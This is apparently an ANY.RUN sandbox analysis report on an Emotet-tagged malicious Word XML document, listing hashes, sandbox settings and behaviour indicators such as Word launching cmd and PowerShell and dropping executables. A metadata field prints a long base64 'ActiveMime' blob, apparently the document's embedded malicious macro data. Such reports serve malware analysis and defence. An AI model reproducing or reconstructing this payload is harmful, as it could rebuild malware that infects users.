Malware analysis Scan Malicious activity | ANY.RUN

analyze malware

Huge database of samples and IOCs
Custom VM setup
Unlimited submissions
Interactive approach

Add for printing

download:	Scan
Full analysis:	https://app.any.run/tasks/c6e59c67-a90b-48df-8163-7cddf245cb50
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Malware Trends Tracker >>>
Analysis date:	January 22, 2019, 23:34:42
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	emotet-doc emotet
Indicators:
MIME:	text/xml
File info:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:	11178C0064BA44DFD44F9044027F9546
SHA1:	5983E8127E7CC3C0CEAC6B570532C01116FA64DB
SHA256:	F8CF592CF8A27ECDD9745C9B954F5AD941C8B1E39DB68422C5C54661C691668C
SSDEEP:	3072:wI8M2egvKFvvnjL/xSu90OoiLuDKZXfwKeljR1z:wJegClvnxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (68.0.3440.106)
Google Update Helper (1.3.33.17)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Starts CMD.EXE for commands execution
  - WINWORD.EXE (PID: 2288)
- Unusual execution from Microsoft Office
  - WINWORD.EXE (PID: 2288)
- Runs app for hidden code execution
  - cmd.exe (PID: 1844)
- Application was dropped or rewritten from another process
  - 543.exe (PID: 2888)
  - 543.exe (PID: 4008)
  - wabmetagen.exe (PID: 3608)
  - wabmetagen.exe (PID: 3744)
- Executes PowerShell scripts
  - cmd.exe (PID: 3576)
SUSPICIOUS
- Starts Microsoft Office Application
  - MSOXMLED.EXE (PID: 2864)
- Starts CMD.EXE for commands execution
  - cmd.exe (PID: 2620)
  - cmd.exe (PID: 3976)
  - cmd.exe (PID: 2536)
  - cmd.exe (PID: 1844)
- Application launched itself
  - cmd.exe (PID: 2536)
  - 543.exe (PID: 4008)
- Creates files in the user directory
  - powershell.exe (PID: 3816)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 3816)
  - 543.exe (PID: 2888)
- Starts itself from another location
  - 543.exe (PID: 2888)
- Connects to unusual port
  - wabmetagen.exe (PID: 3744)
INFO
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 2288)
- Creates files in the user directory
  - WINWORD.EXE (PID: 2288)
- Dropped object may contain Bitcoin addresses
  - powershell.exe (PID: 3816)
  - 543.exe (PID: 2888)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.xml	\|	Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml	\|	Microsoft Office XML Flat File Format (ASCII) (31)
.xml	\|	Generic XML (ASCII) (2.3)
.html	\|	HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch:	360
WordDocumentBodySectSectPrColsSpace:	720
WordDocumentBodySectSectPrPgMarGutter:	-
WordDocumentBodySectSectPrPgMarFooter:	720
WordDocumentBodySectSectPrPgMarHeader:	720
WordDocumentBodySectSectPrPgMarLeft:	1440
WordDocumentBodySectSectPrPgMarBottom:	1440
WordDocumentBodySectSectPrPgMarRight:	1440
WordDocumentBodySectSectPrPgMarTop:	1440
WordDocumentBodySectSectPrPgSzH:	15840
WordDocumentBodySectSectPrPgSzW:	12240
WordDocumentBodySectSectPrRsidR:	005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle:	-
WordDocumentBodySectPRPictShapeImagedataSrc:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle:	width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType:	#_x0000_t75
WordDocumentBodySectPRPictShapeSpid:	_x0000_i1025
WordDocumentBodySectPRPictShapeId:	Picture 1
WordDocumentBodySectPRPictBinData:	(Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio:	t
WordDocumentBodySectPRPictShapetypeLockExt:	edit
WordDocumentBodySectPRPictShapetypePathConnecttype:	rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok:	t
WordDocumentBodySectPRPictShapetypePathExtrusionok:	f
WordDocumentBodySectPRPictShapetypeFormulasFEqn:	if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle:	miter
WordDocumentBodySectPRPictShapetypeStroked:	f
WordDocumentBodySectPRPictShapetypeFilled:	f
WordDocumentBodySectPRPictShapetypePath:	m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative:	t
WordDocumentBodySectPRPictShapetypeSpt:	75
WordDocumentBodySectPRPictShapetypeCoordsize:	21600,21600
WordDocumentBodySectPRPictShapetypeId:	_x0000_t75
WordDocumentBodySectPRRPrNoProof:	-
WordDocumentBodySectPRRsidRPr:	00C90006
WordDocumentBodySectPRsidRDefault:	00BC3A6E
WordDocumentBodySectPRsidR:	005E6EE1
WordDocumentDocPrRsidsRsidVal:	005A24B1
WordDocumentDocPrRsidsRsidRootVal:	005E6EE1
WordDocumentDocPrCompatDontGrowAutofit:	-
WordDocumentDocPrCompatUseAsianBreakRules:	-
WordDocumentDocPrCompatWrapTextWithPunct:	-
WordDocumentDocPrCompatSnapToGridInCell:	-
WordDocumentDocPrCompatBreakWrappedTables:	-
WordDocumentDocPrAlwaysShowPlaceholderTextVal:	off
WordDocumentDocPrIgnoreMixedContentVal:	off
WordDocumentDocPrSaveInvalidXMLVal:	off
WordDocumentDocPrValidateAgainstSchema:	-
WordDocumentDocPrPixelsPerInchVal:	120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile:	-
WordDocumentDocPrOptimizeForBrowser:	-
WordDocumentDocPrCharacterSpacingControlVal:	DontCompress
WordDocumentDocPrPunctuationKerning:	-
WordDocumentDocPrDefaultTabStopVal:	720
WordDocumentDocPrDoNotEmbedSystemFonts:	-
WordDocumentDocPrRemovePersonalInformation:	-
WordDocumentDocPrZoomPercent:	100
WordDocumentDocPrViewVal:	print
WordDocumentShapeDefaultsShapelayoutIdmapData:	1
WordDocumentShapeDefaultsShapelayoutIdmapExt:	edit
WordDocumentShapeDefaultsShapelayoutExt:	edit
WordDocumentShapeDefaultsShapedefaultsSpidmax:	1026
WordDocumentShapeDefaultsShapedefaultsExt:	edit
WordDocumentDocSuppDataBinData:	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 